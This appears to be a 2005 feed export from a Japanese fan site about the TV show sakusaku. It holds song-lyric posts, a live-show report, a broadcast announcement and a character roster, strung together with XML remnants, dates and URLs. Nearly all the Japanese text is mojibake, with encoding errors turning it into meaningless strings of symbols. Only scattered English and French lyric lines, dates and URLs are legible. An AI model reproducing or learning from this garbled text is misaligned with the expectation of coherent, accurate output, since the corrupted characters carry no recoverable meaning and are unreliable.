    -ƒRƒKƒl[ƒ[@÷‚©‚¯‚½‚¢‚ס‚ֵ‚·
    -‚ֵ‚אAƒAƒJƒl[ƒ[...@“¥‚״‚טAƒAƒJƒl[ƒ[...

    - -

    ƒRƒKƒl[ƒ[@•‘ –לƒ}ƒ_ƒ€
    -ƒRƒKƒl[ƒ[@ˆ₪‚µ‚¢ƒ‚ƒiƒ€[ƒ‹i—צlj
    -ƒRƒKƒl[ƒ[@’‹‰÷‚ׂט‚ ‚ָ‚½‚ֶ
    -ƒRƒKƒl[ƒ[@J'ai envie de vous connaitre mieux.
    -i‚ ‚ָ‚½‚נ‚א‚ֱ‚ֶ’m‚ט‚½‚¢‚ס‚ֵ‚·j

    - -

    ƒRƒKƒl[ƒ[@•‘ –לƒ}ƒ_ƒ€
    -ƒRƒKƒl[ƒ[@‚¨­—‚ָƒ‚ƒiƒ€[ƒ‹i—צlj
    -ƒRƒKƒl[ƒ[@’‹‰÷‚ׂט‚ ‚ָ‚½‚ֶ
    -ƒRƒKƒl[ƒ[@C'est pas grave,mon amour.
    -i‘וה•vAˆ₪‚µ‚¢l‚זj

    - -

    La'vie n'est pas la punition.il¶‚ֽ”±‚ֵ‚ֽ‚ָ‚¢j
    -C'est un cadeau.i_—l‚©‚ח‚ּ‘¡‚ט•¨‚¾j

    - -
    -]]>
    -letssing -silknet -2005-12-11T21:07:27+09:00 -
    - -_ֻ‚ּ‚₪‚½ -http://www.sakusaku-silk.net/archives/0512/082339.php - -
    -

    _ֻ‚ּ‚₪‚½

    - -

    •ת‘—“תF05/12/8
    -/‹ָF”’ˆהƒ”ƒBƒ“ƒZƒ“ƒg
    -‰‰‘tFdepapepe+–״‘÷ƒJƒGƒ‰+ƒCƒ“ƒrƒWƒuƒ‹Eƒtƒ@ƒ~ƒ[
    -‰ּF”’ˆהƒ”ƒBƒ“ƒZƒ“ƒg

    - -
    -
    - -

    —‚½ׂ‚ַ‚₪‚µ‚¾‚©‚ח
    -‚₪‚‚­‚¢‚©‚ָ‚¢‚זA‚ָ‚ס‚ִ...
    -—‚½ׂ‚ַ‚₪‚µ‚¾‚©‚ח
    -ה‚©‚ך‡‚₪‚ס‚ֵ‚·

    - -

    ‚ ‚ָ‚½()‚ֶ‚ם‚½‚µ(‰¡•l) (Ah You & I)
    -ƒ|[ƒgƒ^ƒ[‚ֶƒ}ƒƒ“ƒ^ƒ[ (ƒ‚ƒUƒCƒN‚ֶƒRƒXƒ‚ƒ[ƒ‹ƒh)
    -“ל‹’¬‚ֶ’†‰״X(ײ’י•_‚ֶײ’י•_)
    -³’¬‚ֶ³’¬...

    - -

    “”‘ה‚ּץ ‹D“J‚ּ‹¿‚«
    -¡–י‚ֽ2l `‚ֵ2l
    -‚‚ָ‚ֶ‚ּ‚‚ח‚¢‚ֹ‚ֲ‚¢‚ִl‚¦‚ז‚₪

    - -

    KOBE... I Miss You...(‚ ‚ָ‚½‚ׂ¢‚ָ‚¢‚ֶג‚µ‚¢...)
    -KOBE... ‚¢‚ֱ‚µ‚ו‚ֹ‰ּ‚¨‚₪
    -KOBE... I Love You...(_ֻ‚בוD‚«‚ֵ‚·)
    -KO BE WITH YOU...(_ֻ...‚ ‚ָ‚½‚ֶ‚¢‚ֱ‚µ‚ו‚ֹ) YOU... YOU...

    - -


    -—‚½ׂ‚ַ‚₪‚µ‚ג‚©‚ח
    -‚₪‚‚­‚¢‚©‚ײ‚סA‚ָ‚ס‚ִ...
    -—‚½ׂ‚ַ‚₪‚µ‚ג‚©‚ח
    -ה‚©‚ך‡‚₪‚ס‚ֵ‚·‚ם

    - -

    KOBE... I Miss You...(‚ ‚ָ‚½‚ׂ¢‚ָ‚¢‚ֶג‚µ‚¢...)
    -KOBE... ‚¢‚ֱ‚µ‚ו‚ֹ‰ּ‚¨‚₪
    -KOBE... I Love You...(_ֻ‚בוD‚«‚ֵ‚·)
    -KO BE WITH YOU...(_ֻ...‚ ‚ָ‚½‚ֶ‚¢‚ֱ‚µ‚ו‚ֹ) YOU... YOU...
    -YOU... YOU... YOU...

    - -
    -]]>
    -letssing -silknet -2005-12-08T23:39:21+09:00 -
    - -O‘י‰w -http://www.sakusaku-silk.net/archives/0512/030123.php - -
    -

    O‘י‰w

    - -

    •ת‘—“תF05/12/2
    -/‹ָF”’ˆהƒ”ƒBƒ“ƒZƒ“ƒg
    -•ׂ‹ָ‰‰‘tFƒCƒ“ƒrƒWƒuƒ‹Eƒtƒ@ƒ~ƒ[
    -‰ּF”’ˆהƒ”ƒBƒ“ƒZƒ“ƒg

    - -
    -
    - -

    ‚א‚µ‚אAO‘י‰w‚ָׂ‚­‚ָ‚ֱ‚ִ‚µ‚‚ֱ‚½‚ח...
    -O‘יs–¯‚ֽA‚ַ‚₪‚ָ‚ֱ‚ִ‚µ‚‚₪‚¾‚כ‚₪H
    -‚¿ד‚ׂח‚ָ‚¢‚­‚ח‚¢‚ֹס‚נ‚א‚½‚°‚ִ...
    -•‘ ‹«‚ג‹gֻ›‚נ—˜—p‚·‚י‚ּ‚©‚ָH
    -yם‚גƒƒR[ƒh‰®Aִ“ק‰®...
    -—§‚¿‹ע‚¢‚»‚־‰®@‚ַ‚±‚¢‚ֱ‚½‚ּH

    - -

    •ֿ‚ם‚ֱ‚ִ‚µ‚‚ֱ‚½X•ְ‚
    -‚ ‚»‚±‚ּƒQ[ƒ€ƒZƒ“ƒ^[
    -ƒCƒ“ƒx[ƒ_[‚¾‚¯•“
    -50‰~ֿ‚ס‚ֵ‚‚½‚ט@‘¼Z‚ּ¶“k‚ֶƒ‚ƒ‚½‚ט
    -ֿ‚ד‚°‚½50‰~‹@‚­‚¸‚µ‚½‚­‚ָ‚¢

    - -
    -]]>
    -letssing -silknet -2005-12-03T01:23:03+09:00 -
    - -ƒ‰ƒCƒu‚¨”ז‚ך—l‰ן -http://www.sakusaku-silk.net/archives/0512/030042.php -ז“תB‚“‚‚‹‚•‚“‚‚‹‚•‚ּƒ‰ƒCƒu‚ג‚י‚ּ‚ֵ—ˆ‚ִ‚ֻI‚ֱ‚ִ‚¢‚₪ƒGƒ“ƒgƒ[‘‚«‚‚µ‚½‚×A
    -‚»‚ּƒ‰ƒCƒu‚ּ–ֽ—l‚ׂ“‚‚‹‚•‚“‚‚‹‚•‚ֹ—¬‚ך‚¿‚ב‚¢‚‚µ‚½@־

    - -

    mixi‚ֵ‚ָֽ’P‚ֹ´‘z‚ֶ‚©‘‚¢‚ִ‚½‚¯‚ַA‚±‚ֱ‚¿‚ֵ‚ֽ‘S‚­ƒm[ƒ^ƒbƒ`‚¾‚ֱ‚½‚ּ‚ֵA
    -­‚µ‘‚¢‚ִ‚¨‚±‚₪B

    - -

    ‚‚¸‚±‚ּZ56project‚ֹQ‰ֱ‚µ‚½‚«‚ֱ‚©‚¯‚ֽ‚±‚ּƒTƒCƒg‚ײ‚ּˆך’‚ּƒ[ƒ‹B
    -u‚‚ס‚ָ‚ֵ‚₪‚½‚¨‚₪‚בוD‚«‚ֵ‚·B
    -@‚»‚ך‚ֵƒ‰ƒCƒu‚נ‚ג‚י‚±‚ֶ‚ֹ‚ָ‚ט‚‚µ‚½B
    -@‚ֵ‚אƒ{[ƒJƒ‹‚¢‚‚¹‚סB
    -@‚ג‚ֱ‚ִ‚­‚ך‚‚¹‚ס‚©Hv
    -‚‚½‚¢‚ָ´‚¶B

    - -

    ֵ‰@‚¦‚ֱIHH@‚ֱ‚ִv‚ֱ‚½‚¯‚ַB‚ֶ‚ט‚ ‚¦‚¸ˆך“x—K‚¾‚¯©‚³‚¹‚ִ‚א‚ח‚₪‚±‚ֶ‚ֹB
    -‚ֶ‚‚‚»‚ס‚ָ‚«‚ֱ‚©‚¯‚ֵƒ{[ƒJƒ‹‚ג‚ח‚¹‚ִ‚א‚ח‚₪‚±‚ֶ‚ֹ‚ָ‚ט‚‚µ‚½B
    -i‚¿‚ָ‚‚ֹ@ַ—l‚ֽ‚±‚ך‚‚ֵƒ‰ƒCƒuo±‚ֶ‚©‚¢‚ֱ‚³‚¢‚ָ‚¢‚½‚¾‚ּ‘fl@־j

    - -

    ‚ז‚­•·‚¢‚ִ‚‚י‚ֶ@–{”װ‚‚ֵ‚Pƒ–‚א‚ָ‚¢–ֽ—lOOG
    -‚µ‚©‚אc‚ט—K‰ס”‚ׂR‰סH@‚¦H‘וה•vHHH

    - -

    ‚µ‚©‚א’j«ƒ{[ƒJƒ‹‚Pl‚¶‚ב‘«‚ט‚ָ‚¢B‚»‚₪ƒJƒGƒ‰ƒp[ƒgI
    -‚ֶ‚¢‚₪‚±‚ֶ‚ֵAƒJƒGƒ‰ƒp[ƒg‚נ‚‚‰‚˜‚‰ד‚ֵ•וW‚µ‚‚µ‚½B
    -‚±‚ּ“_‚ֵc‚ט‚QTװB
    -‚P‰ס–‚ּ—K‚ֹ‚ֽװ‚ֹ‡‚ם‚¸@—«ƒp[ƒg‚ּ•‚ֽ‘½‚­‚ִ‚אc‚ט‚Q‰ס‚µ‚©—K‚ֵ‚«‚ָ‚¢ף‹µ‚ֹB

    - -

    ‚ּ‚Q‰ס–‚ּ—K‚ֵ‚ג‚ֱ‚ֶ‚ָ‚ס‚ֶ‚©‘SˆץW‚‚י‚±‚ֶ‚×o—ˆ‚½@־
    -‚»‚µ‚ִA‚ ‚יƒRƒg‚נ‚·‚±‚ֶ‚ֹB

    - -

    sakusaku‚ּ•ת‘—‚ֵ‹C‚ֳ‚¢‚½‚©‚א‚µ‚ך‚ָ‚¢‚¯‚ַA
    -‚ ‚ךְ‚ֽƒzƒ“ƒ‚ƒm‚ּ÷‚¶‚ב‚ָ‚¢‚ס‚ֵ‚·‚ז‚ֻB
    -‚»‚ּ‚ ‚יƒRƒg‚ֶ‚ֽ

    - -

    u÷‚נƒ”ƒBƒ“÷(ƒWƒS÷)‚ֹ‚µ‚ִ‚‚ז‚₪Iv

    - -

    ‚»‚₪Bƒ{ƒCƒXƒ`ƒFƒ“ƒWƒƒ[iHj‚ֵ÷‚ּƒL[‚נד‚°‚ִ‰ּ‚₪‚±‚ֶ‚ֹB
    -‚±‚ך‚ׂ©‚ָ‚ט“ן‚µ‚¢EEE
    -©•ּׂ÷‚¾‚¯ƒL[‚×ד‚ׂי‚©‚חA‚»‚ּ‚‚‚ּ‰¹’צ‚ֵ‰ּ‚₪‚ֶ‚‚ֱ‚¿‚ב‰¹‚ׂ¸‚ך‚יI
    -‚µ‚©‚א‚ט‚ּ‰¹‚ֹ‡‚ם‚¹‚ח‚ך‚ָ‚¢I
    -‚»‚₪B‰ּ‚ֱ‚ִ‚י‰¹’צ‚ֶƒXƒs[ƒJ[‚©‚חo‚י‰¹’צ‚ׂ¸‚ך‚ִ‚י‚ּ‚ֵA
    -‚ט‚ּ‰¹’צ‚ז‚ט‚אƒL[‚נ‰÷‚°‚ִ‰ּ‚ם‚ָ‚«‚ב‚¢‚¯‚ָ‚¢B
    -‚¿‚ָ‚‚ֹAƒL[‚ֽ+3‚·‚י‚±‚ֶ‚ֹ‚µ‚½‚ּ‚ֵAְ‚ֹ‰ּ‚₪‚ֹ‚ֽ-3‚ֵ‰ּ‚₪‚ס‚ֵ‚·B

    - -

    ‚‚‚ָ‚ס‚ֶ‚©‚ָ‚י‚ֵ‚µ‚וHR( L[)ƒm
    -‚ֱ‚ִ‚±‚ֶ‚ֵg‚₪‚±‚ֶ‚ֹB
    -‚א‚₪‚ֻAƒ`ƒƒƒƒ“ƒW¸_‚ֵ‚·‚זB

    - -


    -‚»‚µ‚ִO‰ס–‚ּ—K‚ֵ‚ֽ—«ƒ{[ƒJƒ‹‚ׇָB
    -–{”װ‚¾‚ז‚—
    -‚³‚·‚ֹׂ‚‚¸‚¢‚ּ‚ֵA–{”װ‘O‚ֹ‚א‚₪ˆך“x—K‚·‚י‚±‚ֶ‚ֹB

    - -

    ‚»‚µ‚ִ–{”װ‚ּ“תB
    -‘Sˆץƒƒ“ƒo[‚בµ‚ֱ‚½‚ּ‚ׂ±‚ך‚ֵ‚Q‰ס–
    -‚Qװ‚¾‚¯‚ֵ‚·‚×Aֵד‚ּ—K‚נ‚µ‚‚µ‚½B
    -ƒ{ƒCƒXƒ`ƒFƒ“ƒWƒƒ[g‚₪‚¶‚ב‚ָ‚©‚ֱ‚½‚©‚ָ‚H‚ֶ‚¿‚ו‚ֱ‚ֶד‰קB
    -‚ֱ‚ִ‚¢‚₪‚©‰¹’צ‚ם‚©‚ס‚ֻ[‚זII
    -‚א‚₪–³—–מ—‡‚ם‚¹‚י‚‚½‚¢‚ָ´‚¶B
    -‚ז‚­–{”װ‚ֵ‚ ‚ך‚¾‚¯‰¹’צ‡‚ם‚¹‚ח‚ך‚½‚ָ[‚ֱ‚ִv‚ֱ‚½@־
    -—K‚ֵ‚ֽ‚ָ‚ס‚ֶ‚©ƒL[ƒ`ƒFƒ“ƒWד‚ּ÷‚׃Xƒs[ƒJ[‚©‚ח‚ָ‚ס‚ֶ‚©‚«‚±‚¦‚ִ‚½‚ּ‚ֵA
    -‚»‚ך‚ֵ‡‚ם‚¹‚י‚±‚ֶ‚ֵׂ‚«‚½‚ס‚ֵ‚·‚×A
    -–{”װ‚ּƒ‰ƒCƒu‰ןך‚ֵ‚ֽ@‚»‚ּƒL[ƒ`ƒFƒ“ƒWד‚ּ÷‚ׂ‚ֶ‚ס‚ַ•·‚±‚¦‚¸A
    -‚א‚₪‚‚¨‚ֵ‰ּ‚ֱ‚ִ‚‚µ‚½B
    -‚ג‚ֱ‚ֿ‚‚¸‚©‚µ‚¢‚ֻI@•–‹‚ֽ‚ַ‚₪‚ג‚ֱ‚ִ‰ּ‚ֱ‚ִ‚י‚ס‚¾HHHI

    - -

    EEE‚¢‚ג‚¸‚ך‚ִ‚½‚¯‚ַ‚ֻH@‚µ‚ו‚₪‚ָׂ‚©‚ֱ‚½‚ס‚¾‚זI(ƒm_ƒB)ƒrƒFƒFƒ“

    - -

    –{”װ‚ֵ‚ֽ‚©‚ָ‚ט‚ּƒTƒNƒTƒJ[‚×—ˆ‚ִ‚­‚ך‚ִ‘ו´ƒI
    -ƒ`ƒPƒbƒg‚א–³–ƒmƒ‹ƒ}ƒNƒƒA‚µ‚‚µ‚½@־
    -—K‰ס”‚א­‚ָ‚­A®¬“x‚ֽ‚»‚ס‚ָ‚ֹ‚‚­‚ָ‚©‚ֱ‚½‚ס‚ֵ‚·‚×A
    -—ˆ‚ִ‚­‚ך‚½l´׃I

    ]]>
    -other -silknet -2005-12-03T00:42:29+09:00 -
    - -Odƒeƒƒr‚ֵsakusaku•ת‘—‚¾‚ֱ‚ִI -http://www.sakusaku-silk.net/archives/0512/021223.php -usakusaku‚נ©‚ִA‘z‚₪‚±‚ֶBv‚³‚ס‚ֵ‚±‚ס‚ָמ•ס‚×

    - -
    -Odƒeƒƒr‚³‚ס‚ֵA—ˆ”N‚P‚©‚חsakusaku‚ּ•ת‘—‚×–{ˆ‚‚ט‚ּ‚ז‚₪‚ֵ‚·I -
    - -


    -•ת‘—Jn“ת‚ֽ‚P‚P‚O“ת‚ֵA–ˆT‰־—j“ת‚ּy24:30`25:00z‚ֵ•ת‘—‚¾‚»‚₪‚ֵ‚·B
    -‚¢‚‚‚ֵƒ[ƒeƒ‚³‚ס‚ֵ‚ֽ‚©‚ָ‚ט[–י‚ֹ‚ג‚ֱ‚ִ‚¢‚½‚ּ‚ֵA‚±‚ּװ‚ֽ‚₪‚ך‚µ‚¢‚ֵ‚·‚ֻI

    - -

    ƒTƒNƒTƒJ[‚ב‚¦‚ִ‚­‚ך‚י‚ֶ‚¢‚¢‚ָ

    - -

    Odƒeƒƒrצ®ƒTƒCƒgi”װ‘g•\j
    -usakusaku‚נ©‚ִA‘z‚₪‚±‚ֶBv

    ]]>
    -sakusaku -silknet -2005-12-02T12:23:55+09:00 -
    - -‰F“s‹{‚ּ‚₪‚½ -http://www.sakusaku-silk.net/archives/0511/261727.php - -
    -

    ‰F“s‹{‚ּ‚₪‚½

    - -

    •ת‘—“תF05/11/24
    -/‹ָF”’ˆהƒ”ƒBƒ“ƒZƒ“ƒg
    -•ׂ‹ָ‰‰‘tFƒCƒ“ƒrƒWƒuƒ‹Eƒtƒ@ƒ~ƒ[
    -‰ּF”’ˆהƒ”ƒBƒ“ƒZƒ“ƒg

    - -
    -
    - -

    ‚»‚ך‚ֽ‰F“s‹{‚©‚חA‚³‚ס‘R‚ֶ‹P‚¢‚ִ
    -uƒAƒ‹ƒoƒ€v‚ׂג‚ֱ‚ִ‚­‚י
    -‚»‚ך‚ֽ‰F“s‹{‚©‚חuך—p’ƒ••“›v‚ֵ
    -uƒAƒ‹ƒoƒ€v‚ׂג‚ֱ‚ִ‚­‚י
    -ƒXƒiƒbƒN‚ֹONLY ONE
    -‚ֲ‚¢‚ִ‚½‚ ‚ּƒJ[ƒhio‚½I ƒ‰ƒbƒL[ƒJ[ƒhIj
    -‘—‚י‚ֶ...ƒAƒ‹ƒoƒ€‚×Come To Me
    -’ם‚ֶ¹‚ז‚כ‚±‚ס‚ֵ

    - -

    ƒ‰ƒCƒ_[ƒWƒƒƒ“ƒvIiƒWƒƒƒ“ƒvIj
    -‚₪‚ך‚µ‚­‚ִƒWƒƒƒ“ƒvIiƒWƒƒƒ“ƒvIj
    -ƒ‰ƒCƒ_[ƒLƒbƒNIiƒLƒbƒNIj
    -’ם‚ֹƒLƒbƒNI
    -ƒ‰ƒCƒ_[ƒWƒƒƒ“ƒvIiƒWƒƒƒ“ƒvIj
    -‚₪‚ך‚µ‚­‚ִƒWƒƒƒ“ƒvIiƒWƒƒƒ“ƒvIj
    -ƒ‰ƒCƒ_[ƒLƒbƒNIiƒLƒbƒNIj
    -’ם‚ֹƒLƒbƒNI

    - -

    ֳ‚¶‚ו‚ֱ‚ֿ‚¢Ii‚ֿ‚¢Ij
    -ֳ‚¶‚ו‚ֱ‚ֿ‚¢Ii‚ֿ‚¢Ij
    -ƒXƒiƒbƒN‚×ֳ‚¶‚ו‚ֱ‚ֿ‚¢Ii‚ֿ‚¢Ij
    -c‚·‚ֶe‚ֹ‚µ‚©‚ח‚ך‚י
    -‚‚µ‚ִ‚גּ‚ִ‚½‚ט‚·‚י‚ֶ...
    -i‘ו–ג‘ט‚¾‚ז‚ֱIj
    -i‘ו–ג‘ט‚ֵ‚·‚ֻ...j
    -i‘ו–ג‘ט‚ֵ‚·‚ֻ‚ֱIj

    - -

    ‚ֲ‚‚טA‰F“s‹{‚ֽ‰´‚ֹ‚ֶ‚ֱ‚ִƒ‰ƒbƒL[ƒ^ƒEƒ“
    -uƒAƒ‹ƒoƒ€v‚ ‚׃‚ך‚יX
    -ƒJ[ƒh‚¾‚¯—~‚µ‚­‚ִ‚אƒKƒ}ƒ“ l‚ֶ‚µ‚ִƒKƒ}ƒ“
    -‰´AƒGƒ‰ƒC‚¼[‚ֱI
    -‚¿‚ֱ‚¿‚ב‚©‚ֱ‚½‰´‚½‚¿‚ֽ...
    -u‰F“s‹{(‚±‚ּ)v“ַ‚‚ָ‚©‚ֱ‚½...
    -‚‚µ‚ִ‚ג‘‚¯‚א‚µ‚ָ‚©‚ֱ‚½
    -‚¿‚ָ‚‚ֹu“ָ–״(‚±‚ך)v‚א“ַ‚‚ָ‚©‚ֱ‚½...
    -i‚ ‚ִ–¼A•ך‚¿‚ב‚ס‚ֹ—‚‚µ‚©‚ֻ‚¥Ij

    - -

    ֳ‚¶‚ו‚ֱ‚ֿ‚¢Ii‚ֿ‚¢Ij
    -‚ ‚...ֳ‚¶‚ו‚ֱ‚ֿ‚¢Ii‚ֿ‚¢Ij
    -• ‚¢‚ֱ‚ֿ‚¢Ii‚ֿ‚¢Ij
    -‚א‚₪A• ‚¢‚ֱ‚ֿ‚¢...i‚ֿ‚¢Ij
    -ֳ‚¶‚ו‚ֱ‚ֿ‚¢Ii‚ֿ‚¢Ij
    -‚א‚₪A• ‚¢‚ֱ‚ֿ‚¢...i‚ֿ‚¢Ij
    -‚¹‚¢‚¢‚ֱ‚ֿ‚¢Ii‚ֿ‚¢Ij
    -‚¢‚ֱ‚ֿ‚¢A‚¢‚ֱ‚ֿ‚¢...i‚ֿ‚¢Ij

    - -

    ƒ‰ƒCƒ_[ƒLƒbƒNIiƒLƒbƒNIj
    -‚ֶ‚ט‚ ‚¦‚¸ƒLƒbƒNIiƒLƒbƒNIj
    -ƒ‰ƒCƒ_[ƒLƒbƒNIiƒLƒbƒNIj
    -’ם‚ֹƒLƒbƒNIiƒLƒbƒNIj
    -‚»‚ך‚ֵ‚אW‚‘±‚¯‚ִ‚½...
    -‚ ‚ּ ‚ּƒtƒ‰ƒbƒVƒ…ƒoƒbƒNEƒƒ‚ƒ[

    - -

    u¡‚א‰F“s‹{(‚±‚ּX)‚ֽƒ‰ƒbƒL[ƒ^ƒEƒ“Hv
    -uƒMƒ‡ƒEƒU‚ּ¸v‚ֹ‚¿‚ו‚ֱ‚ֶ•·‚¢‚ִ‚‚½...
    -”—‚ֽ‹ף‚נ©ד‚°‚½‚‚...
    -‰½‚א“‚¦‚ִ‚ֽ‚­‚ך‚ָ‚©‚ֱ‚½...
    -iƒ‰ƒbƒL[Aƒ‰ƒbƒL[ƒ^ƒEƒ“j‰F“s‹{‚ֽ...
    -iƒ‰ƒbƒL[Aƒ‰ƒbƒL[ƒ^ƒEƒ“jƒIƒƒIƒ“’‚ט...
    -iƒ‰ƒbƒL[Aƒ‰ƒbƒL[ƒ^ƒEƒ“j‚ֲ‚ֱ‘–‚ךI
    -iƒ‰ƒbƒL[Aƒ‰ƒbƒL[ƒ^ƒEƒ“j

    - -
    -]]>
    -letssing -silknet -2005-11-26T17:27:07+09:00 -
    - -sakusakuƒAƒp[ƒgZl׀‰מ -http://www.sakusaku-silk.net/archives/0511/241325.php -ˆָ‘O‚ּƒAƒp[ƒgZl‚ֽ‚±‚¿‚ח - -
    -
    ”’ˆהƒ”ƒBƒ“ƒZƒ“ƒg
    -
    -

    sakusaku‚ּMCB”װ‘g‚ּ•‘‘ה‚ּƒAƒp[ƒg‚ַּ—l‚נ–±‚‚יB
    -2005”N7‚ֹ‘Oַ—l‚ּ‘“cƒWƒSƒƒE‚©‚חƒoƒgƒ“ƒ^ƒbƒ`B
    -ƒˆ[ƒƒbƒp‚ֽƒIƒ‰ƒ“ƒ_‚ֶƒxƒ‹ƒM[‚ּ‘‹«‚ ‚½‚ט‚©‚ח‚ג‚ֱ‚ִ—ˆ‚½‚ח‚µ‚¢
    -ƒ”ƒBƒ“ƒZƒ“ƒg‚ּuƒ”ƒBv‚ֽ‰÷O‚נy‚­‚‚ֶƒxƒ^[B -

    - -
    -
    og’nF
    ƒxƒ‹ƒM[‚ֶƒIƒ‰ƒ“ƒ_‚ּ‘‹«‚ ‚½‚ט
    -
    ”N—מF
    -
    •KE‹ZF
    ƒcƒoƒJƒbƒ^[&–²‘z•װ‚µ&‚‚‚¦‚•װ‚µ
    -
    D‚«‚ָ•¨F
    ƒg[ƒt@”[“₪
    -
    ™‚¢‚ָ•¨F
    ƒLƒ…ƒEƒ
    -
    - -

    ‚µ‚­‚ֽ‚±‚¿‚ח

    - -
    -
    –״‘÷ƒJƒGƒ‰
    -
    -

    sakusaku‚ּMCB2003”N4‚©‚חV‚µ‚­ƒAƒp[ƒg‚ֹ“‹B»‚R”N–H
    -‹”NCDƒfƒrƒ…[‚נ‰‚½‚µƒA[ƒeƒBƒXƒgˆ“®‚נ‚µ‚ֲ‚ֲAƒtƒ@ƒbƒVƒ‡ƒ“ƒ‚ƒfƒ‹‚ג
    -CM‚ג‚¢‚כ‚ס‚ָˆ“®‚נ‚µ‚ָ‚ׂח‚±‚ּƒAƒp[ƒg‚ֵ•י‚ח‚µ‚ִ‚¢‚י

    - -
    -
    og’nF
    “‹“s
    -
    ’a¶“תF
    1024“ת¶‚‚ך
    -
    ‰t^F
    A^
    -
    •KE‹ZF
    ‚א‚ּ‚‚ֻ
    -
    D‚«‚ָ•¨F
    ”~±‚µ
    -
    ™‚¢‚ָ•¨F
    ƒLƒmƒR
    -
    - - -
    DAE•ִi•ִqj
    -
    -

    ³X‚ֽA–״‘÷ƒJƒGƒ‰‚ּƒXƒ^ƒCƒƒXƒg‚ֵ˜Ql¶‚ּ”—‚ֶ‚¢‚₪’טB
    -¡‚ֵ‚ֽ‚½‚¾‚ּ’¹B’¹ˆָ‰÷H
    -–¼‘O‚ּ—R—ˆ‚ֽog’nF•ִq‚©‚חu•ִqi‚ז‚ֻ‚±jv‚ֹ‚ָ‚יB
    -‚ ‚י–‚ֹ‚ז‚ט2004”N4‚©‚חu•ִqEƒIƒuEƒWƒ‡ƒCƒgƒCv‚ֹ‰–¼B -ˆָד‚¢‚כ‚ס‚ָ–¼‘O‚נo‚ִA¡‚ּDA•ִ‚ֹ’ט’…H

    - - -
    -
    og’nF
    ’¹ז§•ִqs
    -
    ’a¶“תF
    614“ת¶‚‚ך
    -
    ‰t^F
    B^
    -
    •KE‹ZF
    ‘וRIA»‹uƒAƒ’n–I
    -
    - -
    - -
    ˜Ql¶
    -
    -

    ƒAƒp[ƒg‚ּZlB’…‚ֱ‚ִƒƒƒƒƒR[ƒi[‚ּ’S“–B
    -‚¢‚ֲ‚א–ֽ‚־‚©‚טף‚¯‚ִ“‚נף‚¯‚ִ‚¢‚ָ‚¢‚ּ‚ֵ–ˆ”N˜Ql‚µ‚ִ‚¢‚יB
    -ף±‚µ‚ָ‚¢——R‚ֽu“ף‚¯‚ָ‚¯‚ך‚־‘וw‚ֹ—‚¿‚ָ‚¢‚©‚חv
    -ֵ‹‚ׂס‚־‚ֱ‚ִ”­¾‚·‚י‚ז‚₪‚ֹ‚ָ‚ֱ‚ִ‚«‚½B‚¢‚כ‚ס‚ָ–¼¾‚×¶‚‚ך‚י‰ֲ”\«‚ ‚טH

    - -

    ‚¿‚ָ‚‚ֹ˜Ql¶‚ֶ‚¢‚₪–¼‘O‚ּ—R—ˆ‚ֽA‚ ‚י“תƒA[ƒKƒCƒ‹‚ּƒZ[ƒ^[‚נ’…‚ִ‚¢‚ִA
    -ƒWƒSƒƒE‚ֹu‚¨‚‚¦‚ֽ‰ֽ‡m‚©Iv‚ֶ¾‚ם‚ך‚½‚±‚ֶ‚©‚חB

    - -
    -
    og’nF
    ’·ט§
    -
    ’a¶“תF
    310“ת¶‚‚ך
    -
    ‰t^F
    B^
    -
    - -
    - -
    ƒCƒ`ƒmƒZ‚³‚ס
    -
    -

    ‚ ‚©‚¬‚ ‚¢‚¿‚ב‚ס‚ֶ‚·‚ךˆב‚¢‚ֵƒJƒGƒ‰‚¿‚ב‚ס‚׈ר‚ֱ‰z‚µ‚ִ‚­‚יˆָ‘O‚ֹ‚±‚ּƒAƒp[ƒg‚ֹZ‚ס‚ֵ‚¢‚½B
    -‰¹‘¬‚ּ‹M•wl‚ִֶ‚־‚ך‹°‚ך‚ח‚ך‚ִ‚¢‚½H
    -@ֵ‹‘§q‚ּƒPƒ“ƒ^ƒƒE‚ֶ1†÷‚ֹ‹A‚ֱ‚ִ‚«‚½‚×A‚‚½‚ַ‚±‚©‚ֹ—·‚ֹ‚ֵ‚½B -

    -
    - -
    ƒPƒ“ƒ^ƒƒE
    -
    -

    ƒCƒ`ƒmƒZ‚³‚ס‚ּq‹B—·‚ֹo‚י‚‚ֵ‚ֽ’†w¶‚¾‚ֱ‚½‚ּ‚ֹA‹A‚ֱ‚ִ‚«‚½‚ח¬w¶‚ֹ–‚ֱ‚ִ‚¢‚½B
    -i‚½‚װ‚ס’†w¶‚ּƒPƒ“ƒ^ƒƒE‚נ–³‚­‚µ‚½‚ס‚¾‚כ‚₪@־j -

    -
    - - -
    ƒJ[ƒ[“c’†
    -
    -

    ƒAƒp[ƒg‚ּZlB
    -“תX‰®×‚ּד‚ֵJ‚טL‚°‚ח‚ך‚ִ‚¢‚יƒg[ƒN‚נƒJƒƒ‰‚ֵ‹L˜^‚µ‚ִ‚¢‚יB
    -‚©‚ט‚ס‚ֶ‚₪‚×D‚«‚ָ‚±‚ֶ‚©‚חƒJ[ƒ[‚ֶ–¼•t‚¯‚ח‚ך‚יB

    - -
    -
    ‰t^F
    A^
    -
    D‚«‚ָ•¨F
    ‚©‚ט‚ס‚ֶ‚₪
    -
    - -
    - -
    ƒCƒ“ƒrƒWƒuƒ‹EƒMƒ^[’j
    -
    -

    ƒAƒp[ƒg‚ּZlB
    -ƒWƒSƒƒE‚ּƒIƒƒWƒiƒ‹ƒ\ƒ“ƒO‚ּ‰‰‘t‚ג•ׂ‹ָ‚נט‚ׂ¯‚יƒMƒ^[ƒƒXƒgB
    -©‚¦‚ָ‚¢B

    - -

    ‚ ‚¾–¼‚ֽuƒCƒ“‚¿‚ב‚סvB
    -ƒCƒ“‚¿‚ב‚ס‚ֽ‚RlZ’ם‚ֵAZ‹M‚ֹuƒx[ƒX’jvA–…‚ֹuƒNƒ‰ƒƒlƒbƒg—vA‚¢‚ֶ‚±‚ֹuƒsƒAƒm’jv‚ׂ¢‚יB

    - -¡ƒCƒ“ƒrƒWƒuƒ‹‰ֶE‰ֶn}
    -ƒCƒ“ƒrƒWƒuƒ‹‰ֶ -
    - -
    ƒCƒ“ƒrƒWƒuƒ‹Eƒx[ƒX’j
    -
    -

    ƒCƒ“‚¿‚ב‚ס‚ּZ‹MB
    uJ¬‚ּ‚₪‚½v‚©‚חV‚½‚ֹ‚‚ס‚ָ‚ֵ‚₪‚½‚¨‚₪‚ּƒR[ƒi[‚ֹ“oךB
    -‚ ‚¾–¼‚ֽuƒx[‚ג‚סv -

    -
    - -
    ƒCƒ“ƒrƒWƒuƒ‹EƒsƒAƒm’j
    -
    -

    ƒCƒ“‚¿‚ב‚ס‚ּ‚¢‚ֶ‚±B
